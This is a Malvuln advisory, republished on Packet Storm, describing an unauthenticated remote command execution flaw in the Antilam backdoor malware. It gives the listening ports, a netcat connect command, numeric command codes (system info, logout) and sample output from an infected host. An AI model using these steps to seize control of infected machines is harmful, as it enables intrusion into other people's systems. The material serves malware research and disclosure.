Backdoor.Win32.Antilam.14.d Code Execution ≈ Packet Storm

Discovery / credits: Malvuln - (c) 2021
Original source:
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Threat: Backdoor.Win32.Antilam.14.d
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP ports 47891, 29559. Third party attackers who can reach infected systems can execute commands made available by the backdoor. Netcat utility worked the best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. Commands are typically three digits e.g. 001 - 116 and perform various actions on the infected host. For instance to logout the remote system use 033.
Type: PE32
MD5: a53351e8fa0cb4f7db3d0250387a0e4f
Vuln ID: MVID-2021-0214
Dropped files: scandisk.exe
Disclosure: 05/15/2021

nc64.exe x.x.x.x 47891

001 + Enter (Gets system info)

001╧α∩Ωα Windows: C:\WINDOWS
╧α∩Ωα System:
╧α∩Ωα Temp: C:\Users\Victim\AppData\Local\Temp\
┬σ≡±Φ Windows: Windows NT 6.2 9200
╠Φφ≤≥ Γ Windows: 774
╚∞ ■τσ≡α: Victim
▀τ√Ω Windows: English (United States)
╨ατ≡σ°σφΦσ: 1593x810
NumLock: Off
CapsLock: Off
ScrollLock: Off
╧≡εΦπ≡√ΓαφΦσ τΓ≤Ωα: ─α
╤ΓεßεΣφεσ ∞σ±≥ε φα ΣΦ±Ωσ: 3,498,405,888

000Taskbar ±Ω≡√δ± ...005
000Monitor Γ√Ωδ■≈σφ...008
000Ctrl+Alt+Del Γ√Ωδ■≈σφ...010

000CapsLock Γ√Ωδ■≈σφ...011
000NumLock Γ√Ωδ■≈σφ...012
000CD-ROM ταΩ≡√≥...015

01511:24 PM|5/14/2021018
000Mouse was been unlocked...019
9110916023tor: Administrator Command Prompt Promptrator)
000╬Ωφε ταΩ≡√≥ε...024
024Bσ≡±Φ ±σ≡Γσ≡α - 1.4b029
000Web browser ε≥Ω≡√≥...120
000Web browser ε≥Ω≡√≥...0130
000╬Ωφε ±Γσ≡φ≤≥ε...022
9110916022 Hacker [DESKTOP-2B1KWJP\Victim]+ (Administrator)

Other misc commands:
115 starts packman animation that eats the victims screen
116 stops packman animation

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) (TM).


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Ce que l'homme a fait ,

l'homme peut le défaire.


"No secure path in the world"